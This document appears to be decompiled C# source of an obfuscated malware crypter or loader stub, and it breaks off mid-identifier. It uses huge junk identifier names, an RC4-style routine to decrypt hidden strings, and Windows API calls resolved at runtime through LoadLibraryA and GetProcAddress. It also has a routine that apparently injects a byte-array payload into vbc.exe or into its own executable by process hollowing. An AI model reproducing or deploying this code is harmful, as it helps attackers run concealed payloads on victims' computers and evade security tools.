public const long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUoooooooo = 1;
|
|
||||||
public const long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUooooooooo = 4;
|
|
||||||
public const uint JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUoooooooooo = 2;
|
|
||||||
|
|
||||||
public static string eqwrsdafasdf(
|
|
||||||
string asdfsadjfwerjasiodufiouweioru8937497829137489jklasdjf,
|
|
||||||
string asiodufosdafioweurioioasdkljfklasdjflk)
|
|
||||||
{
|
|
||||||
int index1 = 0;
|
|
||||||
int index2 = 0;
|
|
||||||
StringBuilder stringBuilder = new StringBuilder();
|
|
||||||
string empty = string.Empty;
|
|
||||||
int[] numArray1 = new int[257];
|
|
||||||
int[] numArray2 = new int[257];
|
|
||||||
int length = asiodufosdafioweurioioasdkljfklasdjflk.Length;
|
|
||||||
int location1 = 0;
|
|
||||||
while (location1 <= (int) byte.MaxValue)
|
|
||||||
{
|
|
||||||
char String = asiodufosdafioweurioioasdkljfklasdjflk.Substring(location1 % length, 1).ToCharArray()[0];
|
|
||||||
numArray2[location1] = Strings.Asc(String);
|
|
||||||
numArray1[location1] = location1;
|
|
||||||
Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1));
|
|
||||||
}
|
|
||||||
int index3 = 0;
|
|
||||||
int location2 = 0;
|
|
||||||
while (location2 <= (int) byte.MaxValue)
|
|
||||||
{
|
|
||||||
index3 = checked (index3 + numArray1[location2] + numArray2[location2]) % 256;
|
|
||||||
int num = numArray1[location2];
|
|
||||||
numArray1[location2] = numArray1[index3];
|
|
||||||
numArray1[index3] = num;
|
|
||||||
Math.Max(Interlocked.Increment(ref location2), checked (location2 - 1));
|
|
||||||
}
|
|
||||||
location1 = 1;
|
|
||||||
while (location1 <= asdfsadjfwerjasiodufiouweioru8937497829137489jklasdjf.Length)
|
|
||||||
{
|
|
||||||
index1 = checked (index1 + 1) % 256;
|
|
||||||
index2 = checked (index2 + numArray1[index1]) % 256;
|
|
||||||
int num1 = numArray1[index1];
|
|
||||||
numArray1[index1] = numArray1[index2];
|
|
||||||
numArray1[index2] = num1;
|
|
||||||
int num2 = numArray1[checked (numArray1[index1] + numArray1[index2]) % 256];
|
|
||||||
int CharCode = Strings.Asc(asdfsadjfwerjasiodufiouweioru8937497829137489jklasdjf.Substring(checked (location1 - 1), 1).ToCharArray()[0]) ^ num2;
|
|
||||||
stringBuilder.Append(Strings.Chr(CharCode));
|
|
||||||
Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1));
|
|
||||||
}
|
|
||||||
string str = stringBuilder.ToString();
|
|
||||||
stringBuilder.Length = 0;
|
|
||||||
return str;
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUxz(
|
|
||||||
byte[] JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUda)
|
|
||||||
{
|
|
||||||
if (Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles).Contains("x86"))
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUxzg(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUda, Conversions.ToString(Environment.SystemDirectory[0]) + ":\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe");
|
|
||||||
else
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUxzg(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUda, Application.ExecutablePath);
|
|
||||||
}
|
|
||||||
|
|
||||||
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
||||||
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
|
|
||||||
|
|
||||||
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
||||||
public static extern IntPtr GetProcAddress(IntPtr handle, [MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
|
|
||||||
|
|
||||||
public static JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUap JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUc<JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUap>(
|
|
||||||
string JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUra,
|
|
||||||
string JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUrq)
|
|
||||||
{
|
|
||||||
return (JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUap) Marshal.GetDelegateForFunctionPointer(rp.GetProcAddress(rp.LoadLibraryA(ref JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUra), ref JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUrq), typeof (JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUap));
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUxzg(
|
|
||||||
byte[] JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUvz,
|
|
||||||
string JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUvzr)
|
|
||||||
{
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUsadf hkujkrwesffdssfoueowdUsadf = rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFF